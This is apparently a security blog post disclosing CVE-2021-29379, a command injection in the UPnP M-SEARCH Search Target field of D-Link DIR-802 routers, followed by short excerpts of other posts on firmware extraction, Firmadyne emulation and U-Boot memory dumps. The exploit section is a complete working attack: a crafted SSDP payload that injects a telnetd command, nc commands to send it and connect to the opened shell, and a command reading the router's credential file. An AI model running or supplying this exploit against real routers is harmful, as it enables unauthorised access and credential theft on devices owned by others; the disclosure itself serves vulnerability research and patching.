CVE-2021-29379 D-Link DIR-802 UPnP M-SEARCH Command Injection Vulnerability

Introduction

Authentication can be bypassed on D-Link DIR-802 A1 by injecting a payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet.

Exploit

Create a text file with SSDP M-SEARCH payload to inject command to start telnet service on port 1234.

M-SEARCH * HTTP/1.1
HOST:192.168.0.1:1900
ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234
MX:2
MAN:"ssdp:discover"

Send the payload to UPnP UDP port 1900 using nc.

nc -u 192.168.0.1 1900 < payload.txt


Connect to telnet service on TCP port 1234. 

nc -v 192.168.0.1 1234

View the credentials from file /var/passwd.

cat /var/passwd


Video



Comments

Post a Comment

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Image
Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video
Read more

Firmadyne Installation & Emulation of Firmware

Image
 Introduction Firmadyne can be used to perform emulation and analysis of Linux based firmware. Installation Install Ubuntu 18.04 LTS and upgrade all packages: sudo apt update sudo apt upgrade Install and configure other packages: sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python3-psycopg2 snmp uml-utilities util-linux vlan python3-pip python3-magic sudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10 git clone --recursive https://github.com/firmadyne/firmadyne.git git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install cd .. sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne Give firmadyne as password. sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema cd firmadyne ./download.sh sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils nano firmadyne.config Unco
Read more

Dump memory to file from U-Boot console using Memory Display (md) log

Image
 Introduction Dump firmware or other contents from memory of a device with U-Boot bootloader to a file by converting output of memory display (md) command to binary image.  Steps 1. Connect to U-Boot console using picocom and save all outputs in a log file using commad given below. Here the output is saved to log file named 'mdb.log'. sudo picocom /dev/ttyUSB0 --baud 115200 --logfile mdb.log 2. Display the contents of the memory using command: md.b <address> <length> Figure below shows the command to display memory contents from address 0x400000000 and of length 0x20000 (128KB) . The data in this example corresponds to a jffs2 file system. 3. Once the execution completes, edit the log file and remove everything other than md.b output. 4. Clone the github project uboot-mdb-dump.git git clone https://github.com/gmbnomis/uboot-mdb-dump.git 5. Generate the binary image file 'output.bin' from log file 'mdb.log'. python3 uboot-mdb-dump/uboot_mdb_to_image.p
Read more